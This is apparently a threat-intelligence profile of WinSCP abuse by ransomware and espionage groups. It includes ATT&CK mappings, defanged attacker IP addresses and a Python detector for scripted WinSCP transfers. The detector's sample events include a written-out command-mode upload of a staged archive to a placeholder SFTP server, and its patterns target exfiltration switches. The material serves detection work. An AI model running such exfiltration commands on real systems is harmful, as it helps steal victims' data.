WinSCP
WinSCP is a legitimate Windows file transfer utility (Windows Secure Copy) that supports SCP/SFTP and is repeatedly described in the content as being abused by threat actors for data exfiltration rather than as malware in its own right. The content links WinSCP to multiple intrusion sets and ransomware/extortion operations, including Akira affiliates, Phobos/8Base actors, DPRK RGB 3rd Bureau / Andariel (Onyx Sleet), and the Silent Ransom Group (Luna Moth/Chatty Spider/UNC3753). Reported use cases include exfiltration to external SFTP servers, FTP and other protocol-based transfers to actor-controlled infrastructure, and use alongside tools such as PuTTY, Rclone, FileZilla, WinRAR, Cloudflared, and Impacket. In Akira-related intrusions, actors used WinSCP to exfiltrate data to two external SFTP servers after staging archives with WinRAR, and WinSCP.exe was also listed as a tool IOC in SonicWall SSL VPN-related Akira activity. Additional reporting cited WinSCP/FileZilla as alternative exfiltration tooling in Akira and Fog intrusions. Phobos actors were specifically observed using WinSCP and Mega.io for file exfiltration. The Andariel advisory states the group has used PuTTY and WinSCP to exfiltrate data to North Korea-controlled servers via FTP and other protocols. The FBI reporting on Silent Ransom Group states the actors commonly exfiltrate stolen data using WinSCP or a hidden/renamed version of Rclone after gaining access through callback phishing and social engineering. High-confidence behavioral context in the content therefore characterizes WinSCP as dual-use software frequently leveraged for exfiltration over non-C2 protocols, especially SCP/SFTP over port 22, across ransomware, extortion, and espionage operations.
Groups observed using it
2 distinct threat actors attributed by public researchers.
"...data exfiltration conducted through 'WinSCP' (Windows Secure Copy) or a hidden or renamed version of 'Rclone.'"
Techniques & procedures
10 distinct techniques documented for this family, organized by ATT&CK tactic.
Execution
1 technique
WinSCP executed with command-line arguments indicating scripted or automated file transfer. This catches both explicit protocol URLs (sftp://, ftp://, scp://) and command-mode operation (/command, /console, put).
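As an added illustration (not part of this page or any vendor rule), the following Python applies the indicators listed above to process-creation events; the event fields, the OriginalFileName-style lookup (assumed to come from Sysmon-like telemetry) and the sample command lines are all constructed for the example.

```python
import re
from dataclasses import dataclass

# Indicators from the technique description: explicit protocol URLs and
# command-mode switches / the "put" verb used in scripted transfers.
PROTOCOL_URL_RE = re.compile(r"\b(?:sftp|ftp|scp)://", re.IGNORECASE)
SWITCH_RES = {sw: re.compile(r"(?:^|\s)" + re.escape(sw) + r"(?=[\s=]|$)", re.IGNORECASE)
              for sw in ("/command", "/console")}
PUT_RE = re.compile(r"\bput\b", re.IGNORECASE)
WINSCP_NAMES = {"winscp.exe", "winscp.com"}

@dataclass
class ProcessEvent:
    image: str               # full path of the launched binary
    original_file_name: str  # PE version-info name, e.g. Sysmon's OriginalFileName (assumed field)
    command_line: str

def is_winscp(event: ProcessEvent) -> bool:
    # Match on the on-disk name or the PE OriginalFileName, so a renamed copy
    # of WinSCP is still recognised.
    on_disk = event.image.replace("\\", "/").rsplit("/", 1)[-1].lower()
    return on_disk in WINSCP_NAMES or event.original_file_name.lower() in WINSCP_NAMES

def winscp_indicators(event: ProcessEvent) -> list[str]:
    """Scripted-transfer indicators present in a WinSCP process-creation event."""
    if not is_winscp(event):
        return []
    hits = []
    if PROTOCOL_URL_RE.search(event.command_line):
        hits.append("protocol_url")
    hits += [sw for sw, rx in SWITCH_RES.items() if rx.search(event.command_line)]
    if PUT_RE.search(event.command_line):
        hits.append("put")
    return hits

def scan(events: list[ProcessEvent]) -> list[tuple[str, list[str]]]:
    """Return (command_line, indicators) for every event that fires."""
    return [(e.command_line, ind) for e in events if (ind := winscp_indicators(e))]

# Constructed sample events (not from the page): an interactive GUI launch,
# a scripted command-mode upload to an SFTP URL, a renamed copy run in console
# mode, and an unrelated process whose arguments happen to contain "put".
SAMPLE_EVENTS = [
    ProcessEvent(r"C:\Program Files (x86)\WinSCP\WinSCP.exe", "winscp.exe", '"WinSCP.exe"'),
    ProcessEvent(r"C:\Program Files (x86)\WinSCP\WinSCP.com", "winscp.com",
                 'WinSCP.com /command "open sftp://user@203.0.113.10" "put C:\\stage\\a.rar" "exit"'),
    ProcessEvent(r"C:\Users\Public\w.exe", "winscp.exe", "w.exe /console /script=C:\\Users\\Public\\s.txt"),
    ProcessEvent(r"C:\Windows\System32\cmd.exe", "Cmd.Exe", "cmd.exe /c echo put"),
]

if __name__ == "__main__":
    for cl, ind in scan(SAMPLE_EVENTS):
        print(ind, "<-", cl)
```

The plain GUI launch and the unrelated cmd.exe process do not fire, while the renamed copy is still caught through its original file name.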
Credential Access
1 technique
In several incidents, attackers harvested credentials stored by applications, including web browsers, file transfer clients (WinSCP, FileZilla), and remote management tools (mRemoteNG).
Lateral Movement
1 technique
Shortly after this tool was installed, the attacker connected to three VMware ESXi hosts via SSH over port 22.
Collection
1 technique
MAZE Group 2/3 mappings include "T1039: Data from Network Shared Drive," and narrative describes archiving data from corporate file shares.
Command and Control
2 techniques
Spike (> 1GB) in outbound SSH byte transfer activity to remote IP addresses
ATT&CK: T1048, T1071.002, T1021.004
WinSCP connections to 104.149.170[.]183:22 and 23.227.203[.]214:22
In some cases, SRG will run WinSCP or a disguised version of Rclone to scoop up files of interest.
Exfiltration
4 techniques
ADVSTORESHELL exfiltrates data over the same channel used for C2... Agrius exfiltrated staged data using tools such as PuTTY and WinSCP, communicating with command and control servers... numerous malware and groups sent victim data, files, credentials, or host information over existing C2 channels.
Once they've got access to the victim's device, they minimally escalate privileges and quickly pivot to data exfiltration without encryption, using Windows Secure Copy (WinSCP) or a hidden or renamed version of 'Rclone'.
To steal data, Silent Ransom Group uses legitimate tools such as WinSCP and Rclone, as well as cloud services including Google Drive and Microsoft OneDrive.
Recent activity
7 sources tracked across advisories, community write-ups, and news.
WinSCP was used by Akira affiliates for SFTP-based data exfiltration and also appeared in comparative tooling differences across intrusions.
Legitimate SCP/SFTP client used to attempt data exfiltration over SSH (port 22) during the campaign.
Legitimate Windows SCP/SFTP client abused by the threat actors for data exfiltration from compromised environments.
Legitimate file transfer client abused for data exfiltration in support of extortion operations.